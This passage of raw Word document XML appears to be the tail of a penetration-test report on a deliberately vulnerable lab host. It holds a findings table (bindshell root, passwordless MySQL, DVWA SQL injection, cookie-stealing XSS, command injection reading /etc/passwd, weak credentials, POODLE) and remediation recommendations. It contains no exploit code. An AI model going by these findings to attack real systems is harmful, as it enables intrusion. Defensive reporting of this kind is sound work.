        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1350"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Port 1524 Bindshell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1350"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Instant root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MySQL No Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">9.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1350"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">7 DBs dumped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL Injection DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">9.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1350"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">All hashes stolen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">XSS Reflected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1350"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D9822B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie stolen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">9.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1350"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/etc/passwd dumped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VNC Weak Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">9.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1350"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GUI access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tomcat Default Creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1350"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D9822B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Admin access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SSL POODLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2014-3566</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">7.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1350"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D9822B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak Passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1350"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D9822B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10/11 cracked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Recommendations</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="2700"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="auto" w:sz="4"/>
          <w:left w:val="single" w:color="auto" w:sz="4"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4"/>
          <w:right w:val="single" w:color="auto" w:sz="4"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2700"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2700"/>
            <w:shd w:fill="C00000" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL — IMMEDIATE ACTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">9.1 Critical — Immediate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove vsftpd 2.3.4 — upgrade to latest stable version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch Samba to current stable release</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove UnrealIRCd — replace with non-trojaned version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Close port 1524 — remove bindshell service immediately</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Set strong passwords on all MySQL accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">9.2 High — Short Term</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement prepared statements for all SQL queries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitize all user input — prevent XSS and command injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Set HttpOnly and Secure flags on session cookies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Change VNC password to a strong, unique value</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade all services to current stable versions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
